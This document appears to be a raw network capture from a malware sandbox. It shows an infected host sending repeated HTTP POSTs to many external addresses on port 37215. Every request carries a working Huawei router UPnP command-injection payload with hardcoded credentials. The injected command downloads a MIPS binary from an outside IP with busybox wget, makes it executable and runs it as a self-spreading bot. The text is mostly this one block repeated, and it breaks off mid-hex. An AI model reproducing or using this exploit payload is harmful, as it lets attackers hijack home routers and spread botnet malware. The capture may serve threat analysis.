                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1924192.168.2.134855241.17.76.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552225113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1925192.168.2.1333352157.131.94.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552285910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1926192.168.2.134939641.102.137.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552323103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1927192.168.2.1353322157.222.20.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552323103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1928192.168.2.1357934197.24.168.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552369118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1929192.168.2.1334038157.83.133.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552371025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1930192.168.2.133678441.213.184.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552432060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1931192.168.2.134124641.183.79.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552716017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1932192.168.2.134179041.166.121.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552747011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1933192.168.2.1343254157.25.5.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552814960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 